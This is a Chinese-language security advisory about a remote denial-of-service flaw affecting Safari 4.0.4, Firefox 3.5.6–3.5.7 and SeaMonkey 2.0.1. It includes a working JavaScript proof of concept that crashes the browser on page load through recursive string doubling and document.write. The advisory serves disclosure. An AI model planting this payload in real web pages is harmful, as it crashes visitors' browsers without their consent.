漏洞起因
设计错误
危险等级
低
影响系统
Apple Safari 4.0.4 for Windows
Apple Safari 4.0.4
Mozilla SeaMonkey 2.0.1
Mozilla Firefox 3.5.7
Mozilla Firefox 3.5.6
不受影响系统
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户访问。
漏洞信息
Apple Safari是一款流行的WEB浏览器。Mozilla Firefox是一款开放源代码的WEB浏览器。SeaMonkey一款开放源代码的新闻组客户端
Apple Safari存在远程拒绝服务攻击,构建恶意WEB页,诱使用户访问,可导致浏览器崩溃。目前无法确定是否能进行任意代码执行攻击。
测试方法
<body onload="javascript:DoS();"></body>
<script>
function DoS() {
var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
厂商解决方案
目前没有解决方案提供:
http://www.apple.com/safari/
漏洞提供者
599eme Man
0 条评论。